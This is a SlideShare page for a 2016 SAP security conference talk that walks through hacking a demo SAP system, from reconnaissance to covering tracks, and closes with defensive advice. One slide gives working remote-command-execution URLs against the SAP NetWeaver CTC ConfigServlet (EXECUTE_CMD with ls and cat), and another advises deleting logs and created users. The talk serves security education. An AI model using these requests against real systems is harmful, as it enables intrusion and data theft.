SlideShare una empresa de Scribd logo

So You Think You Can Hack | sitNL 2016

Twan van den Broek
Twan van den Broek

Joris van de Vis / ERP-SEC

Empresariales
1 de 19
Descargar para leer sin conexión
SYTYCH#16 So You Think You Can Hack
• Company specialised in securing SAP systems and infrastructures • SAP Security consulting • Regular presenters on SAP Security in Security conferences • Research: In worldwide top 5 for found SAP Security vulnerabilities • Developer Protect4S - Security Analyser for SAPTM • SAP Development Partner • Our mission is to raise the security of mission–critical SAP platforms with minimal impact on day–to–day business. Joris van de VisFred van de Langenberg Robin Vleeschhouwer ERP Security
Let’s do something unique
Collective hack = Grouphack ≠ Grouphug What are we going to do… Hack a SAP system collectively
But wait… Isn’t that illegal? Yes (in many cases) it is. Hence the disclaimer: Hacking is illegal and very naughty. This presentation is not aiming to stimulate or approve hacking. This presentation is meant for academic and educational purposes only. Find the Get-out-of-jail-free card here: I herewith approve all participants of SitNL#16 to hack my SAP system on host XXX Only on November 26 2016.
<TIP>During this presentation QR codes will be shown to simplify calling long URLS’s. You might want to consider installing an App on your mobile phone called a QR code scanner to prevent typing really long URL’s. </TIP> Handy…
Anatomy of a hack… We will go through some common steps of a a hack / penetration test Step 1 – Reconnaissance Gathering of data about the target. Step 2 – Scanning / enumeration Scan the perimeter internally and externally for vulnerabilities. Step 3 – Gain access Use the gathered info retrieved from previous steps to gain access to the target. Step 4 – Keep access / go further To successfully perform an attack access must be maintained over a certain period of time. Also further penetration of the target might be needed to go for the targets crown jewels. Step 5 – Delete tracks Be cautious, don’t get noticed or caught. Make sure to delete your tracks, logs, tooling, created users, etc, etc.
Step 1: Reconnaissance Step 1 - Reconnaissance Try to gather a much information as possible on the business and way of working of the target. Find information like how they operate, type of used systems, procedures, IP- range, domain names, mail serves, dns, etc, etc.. Tooling: social media, (Facebook, linkedin), Google and for example shodan and censys http://whois.domaintools.com/erp-sec.com https://www.shodan.io/search?query=sap+netweaver
Step 1: Reconnaissance
Step 2: Scanning Step 2 – Scanning / enumeration Scan the environment internally and externally to get a clear image of the target. Scanning is done to find open ports with behind them hopefully vulnerable services. Scanning is most often done on network level, think about portscans, scans for specific services, firewall scans, scans to detect Operating Systeem version, etc. Tooling: network scanning- and other scanning tools like NMAP, responder.py, network sniffing tools like Wireshark, keyloggers, etc, etc (Really too many to name)
Step 2: Scanning Step 2 – Scanning / enumeration https://pentest-tools.com/network-vulnerability-scanning/tcp-port-scanner-online-nmap 1 2 3 4 http://<XXXX>:50000/bestaatsinterklaasnuwelofniet?
Step 2: Scanning
Step 3: Gaining access Step 3 – Gaining access Try to gain access to 1 or more systems using information gathered before. From there extract valuable information or further penetrate the landscape. Tooling: Create your own, use exploitation tools to exploit vulnerabilities via SQL injection, xss, csrf, RCE, directory traversal, code injection, verb tampering, etc. Again, too many to name. Use social engineering to hack the human. http://<XXXXXXXX>:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet? param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ls http://XXXXXXXXXXXXXXX:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=c om.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20supergeheimen.txt
Step 3: Gaining access
Towards solutions - There is no silver bullet solution - SAP (Platform) security goes beyond team boundaries. Involve: - SAP Basis team - SAP Authorisations team - Database team - Operating system team - Network team - Involve management, not a pure technical party - Create a Security process, instead of a onetime project - You might consider using tooling to support this process.
Demo Protect4S
Questions? For more information please vitit https://www.erp-sec.com
SAP, R/3, ABAP, SAP GUI, SAP NetWeaver and other SAP products and services mentioned herein as well as their respective logos are trademarks or registered trademarks of SAP AG in Germany and other countries. All other product and service names mentioned are the trademarks of their respective companies. Data contained in this document serves informational purposes only. The authors assume no responsibility for errors or omissions in this document. The authors do not warrant the accuracy or completeness of the information, text, graphics, links, or other items contained within this material. This document is provided without a warranty of any kind, either express or implied, including but not limited to the implied warranties of merchantability, fitness for a particular purpose, or non-infringement. The authors shall have no liability for damages of any kind including without limitation direct, special, indirect, or consequential damages that may result from the use of this document. SAP AG is neither the author nor the publisher of this publication and is not responsible for its content, and SAP Group shall not be liable for errors or omissions with respect to the materials. No part of this document may be reproduced without the prior written permission of ERP Security BV. © 2013 ERP Security BV. Disclaimer
So You Think You Can Hack | sitNL 2016

Recomendados

Recovering Your Customers From Ransomware Without Paying Ransom
Recovering Your Customers From Ransomware Without Paying RansomRecovering Your Customers From Ransomware Without Paying Ransom
Recovering Your Customers From Ransomware Without Paying RansomSolarwinds N-able
 
Stackfield Cloud Security 101
Stackfield Cloud Security 101Stackfield Cloud Security 101
Stackfield Cloud Security 101Stackfield
 
Webinar: Ransomware Checklist – Are You Ready For Ransomware’s Next Wave?
Webinar: Ransomware Checklist – Are You Ready For Ransomware’s Next Wave?Webinar: Ransomware Checklist – Are You Ready For Ransomware’s Next Wave?
Webinar: Ransomware Checklist – Are You Ready For Ransomware’s Next Wave?Storage Switzerland
 
How to Help Your Customers Protect Themselves from Ransomware Attacks
How to Help Your Customers Protect Themselves from Ransomware AttacksHow to Help Your Customers Protect Themselves from Ransomware Attacks
How to Help Your Customers Protect Themselves from Ransomware AttacksSolarwinds N-able
 
Checklist for Preventing Ransomware
Checklist for Preventing RansomwareChecklist for Preventing Ransomware
Checklist for Preventing RansomwareOptimum Healthcare IT
 
10X SOC - SANS Blue Summit Keynote 2021 - Anton Chuvakin
10X SOC - SANS Blue Summit Keynote 2021 - Anton Chuvakin10X SOC - SANS Blue Summit Keynote 2021 - Anton Chuvakin
10X SOC - SANS Blue Summit Keynote 2021 - Anton ChuvakinAnton Chuvakin
 
Best practices in NIPS - Brighttalk - January 2010
Best practices in NIPS - Brighttalk - January 2010Best practices in NIPS - Brighttalk - January 2010
Best practices in NIPS - Brighttalk - January 2010EQS Group
 
Real-time fallacy: how real-time your security really is?
Real-time fallacy: how real-time your security really is?Real-time fallacy: how real-time your security really is?
Real-time fallacy: how real-time your security really is?Anton Chuvakin
 

Recomendados

Recovering Your Customers From Ransomware Without Paying Ransom
Recovering Your Customers From Ransomware Without Paying RansomRecovering Your Customers From Ransomware Without Paying Ransom
Recovering Your Customers From Ransomware Without Paying RansomSolarwinds N-able
 
Stackfield Cloud Security 101
Stackfield Cloud Security 101Stackfield Cloud Security 101
Stackfield Cloud Security 101Stackfield
 
Webinar: Ransomware Checklist – Are You Ready For Ransomware’s Next Wave?
Webinar: Ransomware Checklist – Are You Ready For Ransomware’s Next Wave?Webinar: Ransomware Checklist – Are You Ready For Ransomware’s Next Wave?
Webinar: Ransomware Checklist – Are You Ready For Ransomware’s Next Wave?Storage Switzerland
 
How to Help Your Customers Protect Themselves from Ransomware Attacks
How to Help Your Customers Protect Themselves from Ransomware AttacksHow to Help Your Customers Protect Themselves from Ransomware Attacks
How to Help Your Customers Protect Themselves from Ransomware AttacksSolarwinds N-able
 
Checklist for Preventing Ransomware
Checklist for Preventing RansomwareChecklist for Preventing Ransomware
Checklist for Preventing RansomwareOptimum Healthcare IT
 
10X SOC - SANS Blue Summit Keynote 2021 - Anton Chuvakin
10X SOC - SANS Blue Summit Keynote 2021 - Anton Chuvakin10X SOC - SANS Blue Summit Keynote 2021 - Anton Chuvakin
10X SOC - SANS Blue Summit Keynote 2021 - Anton ChuvakinAnton Chuvakin
 
Best practices in NIPS - Brighttalk - January 2010
Best practices in NIPS - Brighttalk - January 2010Best practices in NIPS - Brighttalk - January 2010
Best practices in NIPS - Brighttalk - January 2010EQS Group
 
Real-time fallacy: how real-time your security really is?
Real-time fallacy: how real-time your security really is?Real-time fallacy: how real-time your security really is?
Real-time fallacy: how real-time your security really is?Anton Chuvakin
 
Opening slides | sitNL 2016
Opening slides | sitNL 2016Opening slides | sitNL 2016
Opening slides | sitNL 2016Twan van den Broek
 
Sap microsoft interoperability sitnl 08-12-2012
Sap microsoft interoperability sitnl 08-12-2012Sap microsoft interoperability sitnl 08-12-2012
Sap microsoft interoperability sitnl 08-12-2012Twan van den Broek
 
SafeToBike / Hackaton with SAPHCP | sitNL 2016
SafeToBike / Hackaton with SAPHCP | sitNL 2016SafeToBike / Hackaton with SAPHCP | sitNL 2016
SafeToBike / Hackaton with SAPHCP | sitNL 2016Twan van den Broek
 
Mobile Performance Support at Belgian Railways: Future on-the-job-help, learn...
Mobile Performance Support at Belgian Railways: Future on-the-job-help, learn...Mobile Performance Support at Belgian Railways: Future on-the-job-help, learn...
Mobile Performance Support at Belgian Railways: Future on-the-job-help, learn...Thomas Jenewein
 
ABAP Developers, who moved your code?
ABAP Developers, who moved your code?ABAP Developers, who moved your code?
ABAP Developers, who moved your code?Roel van den Berge
 
SAP Developers Update
SAP Developers UpdateSAP Developers Update
SAP Developers UpdateVitaliy Rudnytskiy
 
SAP TechEd 2015 takeaway
SAP TechEd 2015 takeawaySAP TechEd 2015 takeaway
SAP TechEd 2015 takeawaySven van Leuken, Bsc, PMP
 
SAP HANA SPS10- SAP HANA Development Tools
SAP HANA SPS10- SAP HANA Development ToolsSAP HANA SPS10- SAP HANA Development Tools
SAP HANA SPS10- SAP HANA Development ToolsSAP Technology
 
SAP BusinessObjects BI Platform - What's New in Feature Pack 3
SAP BusinessObjects BI Platform - What's New in Feature Pack 3SAP BusinessObjects BI Platform - What's New in Feature Pack 3
SAP BusinessObjects BI Platform - What's New in Feature Pack 3SAP Analytics
 
Top Five Reasons to Upgrade to SAP NetWeaver Portal 7.3
Top Five Reasons to Upgrade to SAP NetWeaver Portal 7.3Top Five Reasons to Upgrade to SAP NetWeaver Portal 7.3
Top Five Reasons to Upgrade to SAP NetWeaver Portal 7.3SAP Portal
 
SAP Digital Boardroom in a Nutshell record of achievement
SAP Digital Boardroom in a Nutshell record of achievementSAP Digital Boardroom in a Nutshell record of achievement
SAP Digital Boardroom in a Nutshell record of achievementGerhardus Vorster
 
SAP HANA SPS09 - Smart Data Streaming
SAP HANA SPS09 - Smart Data StreamingSAP HANA SPS09 - Smart Data Streaming
SAP HANA SPS09 - Smart Data StreamingSAP Technology
 
IoT Cloud2Cloud Connector
IoT Cloud2Cloud ConnectorIoT Cloud2Cloud Connector
IoT Cloud2Cloud ConnectorMark Teichmann
 
SAP HANA SPS09 - Development Tools
SAP HANA SPS09 - Development ToolsSAP HANA SPS09 - Development Tools
SAP HANA SPS09 - Development ToolsSAP Technology
 
Best Practices for Upgrading Your Portal to SAP NetWeaver 7.3
Best Practices for Upgrading Your Portal to SAP NetWeaver 7.3Best Practices for Upgrading Your Portal to SAP NetWeaver 7.3
Best Practices for Upgrading Your Portal to SAP NetWeaver 7.3SAP Portal
 
What's new on SAP HANA Smart Data Access
What's new on SAP HANA Smart Data AccessWhat's new on SAP HANA Smart Data Access
What's new on SAP HANA Smart Data AccessSAP Technology
 
Synchronizing Data in SAP HANA Using SAP SQL Anywhere
Synchronizing Data in SAP HANA Using SAP SQL AnywhereSynchronizing Data in SAP HANA Using SAP SQL Anywhere
Synchronizing Data in SAP HANA Using SAP SQL AnywhereSAP Technology
 
SAP HANA SPS09 - Series Data
SAP HANA SPS09 - Series DataSAP HANA SPS09 - Series Data
SAP HANA SPS09 - Series DataSAP Technology
 
SAP S/4HANA - What it really is and what not
SAP S/4HANA - What it really is and what notSAP S/4HANA - What it really is and what not
SAP S/4HANA - What it really is and what nottamas_szirtes
 
SAP HANA SPS10- Series Data/ TimeSeries
SAP HANA SPS10- Series Data/ TimeSeriesSAP HANA SPS10- Series Data/ TimeSeries
SAP HANA SPS10- Series Data/ TimeSeriesSAP Technology
 
Short introduction to SAP security research (sitNL)
Short introduction to SAP security research (sitNL)Short introduction to SAP security research (sitNL)
Short introduction to SAP security research (sitNL)Twan van den Broek
 
Erp security joris-van_de_vis_sap_security_sitnl_2015_v0.2
Erp security joris-van_de_vis_sap_security_sitnl_2015_v0.2Erp security joris-van_de_vis_sap_security_sitnl_2015_v0.2
Erp security joris-van_de_vis_sap_security_sitnl_2015_v0.2jvandevis
 

Más contenido relacionado

Destacado

Sap microsoft interoperability sitnl 08-12-2012
Sap microsoft interoperability sitnl 08-12-2012Sap microsoft interoperability sitnl 08-12-2012
Sap microsoft interoperability sitnl 08-12-2012Twan van den Broek
 
SafeToBike / Hackaton with SAPHCP | sitNL 2016
SafeToBike / Hackaton with SAPHCP | sitNL 2016SafeToBike / Hackaton with SAPHCP | sitNL 2016
SafeToBike / Hackaton with SAPHCP | sitNL 2016Twan van den Broek
 
Mobile Performance Support at Belgian Railways: Future on-the-job-help, learn...
Mobile Performance Support at Belgian Railways: Future on-the-job-help, learn...Mobile Performance Support at Belgian Railways: Future on-the-job-help, learn...
Mobile Performance Support at Belgian Railways: Future on-the-job-help, learn...Thomas Jenewein
 
ABAP Developers, who moved your code?
ABAP Developers, who moved your code?ABAP Developers, who moved your code?
ABAP Developers, who moved your code?Roel van den Berge
 
SAP HANA SPS10- SAP HANA Development Tools
SAP HANA SPS10- SAP HANA Development ToolsSAP HANA SPS10- SAP HANA Development Tools
SAP HANA SPS10- SAP HANA Development ToolsSAP Technology
 
SAP BusinessObjects BI Platform - What's New in Feature Pack 3
SAP BusinessObjects BI Platform - What's New in Feature Pack 3SAP BusinessObjects BI Platform - What's New in Feature Pack 3
SAP BusinessObjects BI Platform - What's New in Feature Pack 3SAP Analytics
 
Top Five Reasons to Upgrade to SAP NetWeaver Portal 7.3
Top Five Reasons to Upgrade to SAP NetWeaver Portal 7.3Top Five Reasons to Upgrade to SAP NetWeaver Portal 7.3
Top Five Reasons to Upgrade to SAP NetWeaver Portal 7.3SAP Portal
 
SAP Digital Boardroom in a Nutshell record of achievement
SAP Digital Boardroom in a Nutshell record of achievementSAP Digital Boardroom in a Nutshell record of achievement
SAP Digital Boardroom in a Nutshell record of achievementGerhardus Vorster
 
SAP HANA SPS09 - Smart Data Streaming
SAP HANA SPS09 - Smart Data StreamingSAP HANA SPS09 - Smart Data Streaming
SAP HANA SPS09 - Smart Data StreamingSAP Technology
 
IoT Cloud2Cloud Connector
IoT Cloud2Cloud ConnectorIoT Cloud2Cloud Connector
IoT Cloud2Cloud ConnectorMark Teichmann
 
SAP HANA SPS09 - Development Tools
SAP HANA SPS09 - Development ToolsSAP HANA SPS09 - Development Tools
SAP HANA SPS09 - Development ToolsSAP Technology
 
Best Practices for Upgrading Your Portal to SAP NetWeaver 7.3
Best Practices for Upgrading Your Portal to SAP NetWeaver 7.3Best Practices for Upgrading Your Portal to SAP NetWeaver 7.3
Best Practices for Upgrading Your Portal to SAP NetWeaver 7.3SAP Portal
 
What's new on SAP HANA Smart Data Access
What's new on SAP HANA Smart Data AccessWhat's new on SAP HANA Smart Data Access
What's new on SAP HANA Smart Data AccessSAP Technology
 
Synchronizing Data in SAP HANA Using SAP SQL Anywhere
Synchronizing Data in SAP HANA Using SAP SQL AnywhereSynchronizing Data in SAP HANA Using SAP SQL Anywhere
Synchronizing Data in SAP HANA Using SAP SQL AnywhereSAP Technology
 
SAP HANA SPS09 - Series Data
SAP HANA SPS09 - Series DataSAP HANA SPS09 - Series Data
SAP HANA SPS09 - Series DataSAP Technology
 
SAP S/4HANA - What it really is and what not
SAP S/4HANA - What it really is and what notSAP S/4HANA - What it really is and what not
SAP S/4HANA - What it really is and what nottamas_szirtes
 
SAP HANA SPS10- Series Data/ TimeSeries
SAP HANA SPS10- Series Data/ TimeSeriesSAP HANA SPS10- Series Data/ TimeSeries
SAP HANA SPS10- Series Data/ TimeSeriesSAP Technology
 

Destacado (20)

Opening slides | sitNL 2016
Opening slides | sitNL 2016Opening slides | sitNL 2016
Opening slides | sitNL 2016
 
Sap microsoft interoperability sitnl 08-12-2012
Sap microsoft interoperability sitnl 08-12-2012Sap microsoft interoperability sitnl 08-12-2012
Sap microsoft interoperability sitnl 08-12-2012
 
SafeToBike / Hackaton with SAPHCP | sitNL 2016
SafeToBike / Hackaton with SAPHCP | sitNL 2016SafeToBike / Hackaton with SAPHCP | sitNL 2016
SafeToBike / Hackaton with SAPHCP | sitNL 2016
 
Mobile Performance Support at Belgian Railways: Future on-the-job-help, learn...
Mobile Performance Support at Belgian Railways: Future on-the-job-help, learn...Mobile Performance Support at Belgian Railways: Future on-the-job-help, learn...
Mobile Performance Support at Belgian Railways: Future on-the-job-help, learn...
 
ABAP Developers, who moved your code?
ABAP Developers, who moved your code?ABAP Developers, who moved your code?
ABAP Developers, who moved your code?
 
SAP Developers Update
SAP Developers UpdateSAP Developers Update
SAP Developers Update
 
SAP TechEd 2015 takeaway
SAP TechEd 2015 takeawaySAP TechEd 2015 takeaway
SAP TechEd 2015 takeaway
 
SAP HANA SPS10- SAP HANA Development Tools
SAP HANA SPS10- SAP HANA Development ToolsSAP HANA SPS10- SAP HANA Development Tools
SAP HANA SPS10- SAP HANA Development Tools
 
SAP BusinessObjects BI Platform - What's New in Feature Pack 3
SAP BusinessObjects BI Platform - What's New in Feature Pack 3SAP BusinessObjects BI Platform - What's New in Feature Pack 3
SAP BusinessObjects BI Platform - What's New in Feature Pack 3
 
Top Five Reasons to Upgrade to SAP NetWeaver Portal 7.3
Top Five Reasons to Upgrade to SAP NetWeaver Portal 7.3Top Five Reasons to Upgrade to SAP NetWeaver Portal 7.3
Top Five Reasons to Upgrade to SAP NetWeaver Portal 7.3
 
SAP Digital Boardroom in a Nutshell record of achievement
SAP Digital Boardroom in a Nutshell record of achievementSAP Digital Boardroom in a Nutshell record of achievement
SAP Digital Boardroom in a Nutshell record of achievement
 
SAP HANA SPS09 - Smart Data Streaming
SAP HANA SPS09 - Smart Data StreamingSAP HANA SPS09 - Smart Data Streaming
SAP HANA SPS09 - Smart Data Streaming
 
IoT Cloud2Cloud Connector
IoT Cloud2Cloud ConnectorIoT Cloud2Cloud Connector
IoT Cloud2Cloud Connector
 
SAP HANA SPS09 - Development Tools
SAP HANA SPS09 - Development ToolsSAP HANA SPS09 - Development Tools
SAP HANA SPS09 - Development Tools
 
Best Practices for Upgrading Your Portal to SAP NetWeaver 7.3
Best Practices for Upgrading Your Portal to SAP NetWeaver 7.3Best Practices for Upgrading Your Portal to SAP NetWeaver 7.3
Best Practices for Upgrading Your Portal to SAP NetWeaver 7.3
 
What's new on SAP HANA Smart Data Access
What's new on SAP HANA Smart Data AccessWhat's new on SAP HANA Smart Data Access
What's new on SAP HANA Smart Data Access
 
Synchronizing Data in SAP HANA Using SAP SQL Anywhere
Synchronizing Data in SAP HANA Using SAP SQL AnywhereSynchronizing Data in SAP HANA Using SAP SQL Anywhere
Synchronizing Data in SAP HANA Using SAP SQL Anywhere
 
SAP HANA SPS09 - Series Data
SAP HANA SPS09 - Series DataSAP HANA SPS09 - Series Data
SAP HANA SPS09 - Series Data
 
SAP S/4HANA - What it really is and what not
SAP S/4HANA - What it really is and what notSAP S/4HANA - What it really is and what not
SAP S/4HANA - What it really is and what not
 
SAP HANA SPS10- Series Data/ TimeSeries
SAP HANA SPS10- Series Data/ TimeSeriesSAP HANA SPS10- Series Data/ TimeSeries
SAP HANA SPS10- Series Data/ TimeSeries
 

Similar a So You Think You Can Hack | sitNL 2016

Short introduction to SAP security research (sitNL)
Short introduction to SAP security research (sitNL)Short introduction to SAP security research (sitNL)
Short introduction to SAP security research (sitNL)Twan van den Broek
 
Erp security joris-van_de_vis_sap_security_sitnl_2015_v0.2
Erp security joris-van_de_vis_sap_security_sitnl_2015_v0.2Erp security joris-van_de_vis_sap_security_sitnl_2015_v0.2
Erp security joris-van_de_vis_sap_security_sitnl_2015_v0.2jvandevis
 
[CB19] Spyware, Ransomware and Worms. How to prevent the next SAP tragedy by ...
[CB19] Spyware, Ransomware and Worms. How to prevent the next SAP tragedy by ...[CB19] Spyware, Ransomware and Worms. How to prevent the next SAP tragedy by ...
[CB19] Spyware, Ransomware and Worms. How to prevent the next SAP tragedy by ...CODE BLUE
 
End-to-end SAP S/4HANA security projects are child’s play – if you have the r...
End-to-end SAP S/4HANA security projects are child’s play – if you have the r...End-to-end SAP S/4HANA security projects are child’s play – if you have the r...
End-to-end SAP S/4HANA security projects are child’s play – if you have the r...akquinet enterprise solutions GmbH
 
SAP Inside Track Frankfurt 2018 #Sitfra 2018
SAP Inside Track Frankfurt 2018 #Sitfra 2018SAP Inside Track Frankfurt 2018 #Sitfra 2018
SAP Inside Track Frankfurt 2018 #Sitfra 2018jvandevis
 
SAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crimeSAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crimeOnapsis Inc.
 
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP ForensicsOnapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP ForensicsOnapsis Inc.
 
DeltaGRiC_Consulting_SMAC_Digital Innovation Security Conference_Presentation...
DeltaGRiC_Consulting_SMAC_Digital Innovation Security Conference_Presentation...DeltaGRiC_Consulting_SMAC_Digital Innovation Security Conference_Presentation...
DeltaGRiC_Consulting_SMAC_Digital Innovation Security Conference_Presentation...Tunde Ogunkoya
 
Intro to-ssdl--lone-star-php-2013
Intro to-ssdl--lone-star-php-2013Intro to-ssdl--lone-star-php-2013
Intro to-ssdl--lone-star-php-2013nanderoo
 
The importance of applying SAP patches (Joris van de Vis)
The importance of applying SAP patches (Joris van de Vis)The importance of applying SAP patches (Joris van de Vis)
The importance of applying SAP patches (Joris van de Vis)Twan van den Broek
 
sitNL Security Update from SAP TechEd 2013
sitNL Security Update from SAP TechEd 2013sitNL Security Update from SAP TechEd 2013
sitNL Security Update from SAP TechEd 2013Twan van den Broek
 
SAP inside track NL 2013, SAP Security update
SAP inside track NL 2013, SAP Security updateSAP inside track NL 2013, SAP Security update
SAP inside track NL 2013, SAP Security updatejvandevis
 
Penetration Testing SAP Systems
Penetration Testing SAP SystemsPenetration Testing SAP Systems
Penetration Testing SAP SystemsOnapsis Inc.
 
Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)ERPScan
 
Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)ERPScan
 
Incident Response and SAP Systems
Incident Response and SAP SystemsIncident Response and SAP Systems
Incident Response and SAP SystemsOnapsis Inc.
 
Cyber-attacks to SAP Systems
Cyber-attacks to SAP SystemsCyber-attacks to SAP Systems
Cyber-attacks to SAP SystemsOnapsis Inc.
 

Similar a So You Think You Can Hack | sitNL 2016 (20)

Short introduction to SAP security research (sitNL)
Short introduction to SAP security research (sitNL)Short introduction to SAP security research (sitNL)
Short introduction to SAP security research (sitNL)
 
Erp security joris-van_de_vis_sap_security_sitnl_2015_v0.2
Erp security joris-van_de_vis_sap_security_sitnl_2015_v0.2Erp security joris-van_de_vis_sap_security_sitnl_2015_v0.2
Erp security joris-van_de_vis_sap_security_sitnl_2015_v0.2
 
protect4s-product-sheet
protect4s-product-sheetprotect4s-product-sheet
protect4s-product-sheet
 
[CB19] Spyware, Ransomware and Worms. How to prevent the next SAP tragedy by ...
[CB19] Spyware, Ransomware and Worms. How to prevent the next SAP tragedy by ...[CB19] Spyware, Ransomware and Worms. How to prevent the next SAP tragedy by ...
[CB19] Spyware, Ransomware and Worms. How to prevent the next SAP tragedy by ...
 
End-to-end SAP S/4HANA security projects are child’s play – if you have the r...
End-to-end SAP S/4HANA security projects are child’s play – if you have the r...End-to-end SAP S/4HANA security projects are child’s play – if you have the r...
End-to-end SAP S/4HANA security projects are child’s play – if you have the r...
 
SAP Inside Track Frankfurt 2018 #Sitfra 2018
SAP Inside Track Frankfurt 2018 #Sitfra 2018SAP Inside Track Frankfurt 2018 #Sitfra 2018
SAP Inside Track Frankfurt 2018 #Sitfra 2018
 
SAST Code Security Advisor for SAP [Webinar]
SAST Code Security Advisor for SAP [Webinar]SAST Code Security Advisor for SAP [Webinar]
SAST Code Security Advisor for SAP [Webinar]
 
SAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crimeSAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crime
 
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP ForensicsOnapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
 
DeltaGRiC_Consulting_SMAC_Digital Innovation Security Conference_Presentation...
DeltaGRiC_Consulting_SMAC_Digital Innovation Security Conference_Presentation...DeltaGRiC_Consulting_SMAC_Digital Innovation Security Conference_Presentation...
DeltaGRiC_Consulting_SMAC_Digital Innovation Security Conference_Presentation...
 
Intro to-ssdl--lone-star-php-2013
Intro to-ssdl--lone-star-php-2013Intro to-ssdl--lone-star-php-2013
Intro to-ssdl--lone-star-php-2013
 
The importance of applying SAP patches (Joris van de Vis)
The importance of applying SAP patches (Joris van de Vis)The importance of applying SAP patches (Joris van de Vis)
The importance of applying SAP patches (Joris van de Vis)
 
sitNL Security Update from SAP TechEd 2013
sitNL Security Update from SAP TechEd 2013sitNL Security Update from SAP TechEd 2013
sitNL Security Update from SAP TechEd 2013
 
SAP inside track NL 2013, SAP Security update
SAP inside track NL 2013, SAP Security updateSAP inside track NL 2013, SAP Security update
SAP inside track NL 2013, SAP Security update
 
Penetration Testing SAP Systems
Penetration Testing SAP SystemsPenetration Testing SAP Systems
Penetration Testing SAP Systems
 
Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)
 
Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)
 
An easy way into your sap systems v3.0
An easy way into your sap systems v3.0An easy way into your sap systems v3.0
An easy way into your sap systems v3.0
 
Incident Response and SAP Systems
Incident Response and SAP SystemsIncident Response and SAP Systems
Incident Response and SAP Systems
 
Cyber-attacks to SAP Systems
Cyber-attacks to SAP SystemsCyber-attacks to SAP Systems
Cyber-attacks to SAP Systems
 

Más de Twan van den Broek

How SAP Leonardo is empowering animal wellbeing (Leon / Harmen)
How SAP Leonardo is empowering animal wellbeing (Leon / Harmen)How SAP Leonardo is empowering animal wellbeing (Leon / Harmen)
How SAP Leonardo is empowering animal wellbeing (Leon / Harmen)Twan van den Broek
 
Can you keep up with SAP Analytics Cloud? (Martijn van Foeken)
Can you keep up with SAP Analytics Cloud? (Martijn van Foeken)Can you keep up with SAP Analytics Cloud? (Martijn van Foeken)
Can you keep up with SAP Analytics Cloud? (Martijn van Foeken)Twan van den Broek
 
SAP Data Hub – What is it, and what’s new? (Sefan Linders)
SAP Data Hub – What is it, and what’s new? (Sefan Linders)SAP Data Hub – What is it, and what’s new? (Sefan Linders)
SAP Data Hub – What is it, and what’s new? (Sefan Linders)Twan van den Broek
 
SAP HANA SQL Data Warehousing (Sefan Linders)
SAP HANA SQL Data Warehousing (Sefan Linders)SAP HANA SQL Data Warehousing (Sefan Linders)
SAP HANA SQL Data Warehousing (Sefan Linders)Twan van den Broek
 
SAP analytics as enabler for the intelligent enterprise (Iver van de Zand)
SAP analytics as enabler for the intelligent enterprise (Iver van de Zand)SAP analytics as enabler for the intelligent enterprise (Iver van de Zand)
SAP analytics as enabler for the intelligent enterprise (Iver van de Zand)Twan van den Broek
 
Beyond OData introducing the xmla model for ui5 (Roland Bouwman)
Beyond OData introducing the xmla model for ui5 (Roland Bouwman)Beyond OData introducing the xmla model for ui5 (Roland Bouwman)
Beyond OData introducing the xmla model for ui5 (Roland Bouwman)Twan van den Broek
 
Integrating SAPUI5 with ArcGIS Maps (Leon van Ginneken)
Integrating SAPUI5 with ArcGIS Maps (Leon van Ginneken)Integrating SAPUI5 with ArcGIS Maps (Leon van Ginneken)
Integrating SAPUI5 with ArcGIS Maps (Leon van Ginneken)Twan van den Broek
 
SQL Data Warehousing in SAP HANA (Sefan Linders)
SQL Data Warehousing in SAP HANA (Sefan Linders)SQL Data Warehousing in SAP HANA (Sefan Linders)
SQL Data Warehousing in SAP HANA (Sefan Linders)Twan van den Broek
 
SAP Predictive Analytics (Nico van der Hoeven)
SAP Predictive Analytics (Nico van der Hoeven)SAP Predictive Analytics (Nico van der Hoeven)
SAP Predictive Analytics (Nico van der Hoeven)Twan van den Broek
 
DIR - A tribute to Standards and Guidelines... (Laurens van Rijn)
DIR - A tribute to Standards and Guidelines... (Laurens van Rijn)DIR - A tribute to Standards and Guidelines... (Laurens van Rijn)
DIR - A tribute to Standards and Guidelines... (Laurens van Rijn)Twan van den Broek
 
Building an innovation culture - Powered by diversity
Building an innovation culture - Powered by diversityBuilding an innovation culture - Powered by diversity
Building an innovation culture - Powered by diversityTwan van den Broek
 
SAP Leonardo / Machine Learning (Iver van de Zand)
SAP Leonardo / Machine Learning (Iver van de Zand)SAP Leonardo / Machine Learning (Iver van de Zand)
SAP Leonardo / Machine Learning (Iver van de Zand)Twan van den Broek
 
SAP TechEd recap (Ronald Konijnenburg / Sven van Leuken)
SAP TechEd recap (Ronald Konijnenburg / Sven van Leuken)SAP TechEd recap (Ronald Konijnenburg / Sven van Leuken)
SAP TechEd recap (Ronald Konijnenburg / Sven van Leuken)Twan van den Broek
 
Masterclass Mendix (Jan Penninkhof / Twan van den Broek)
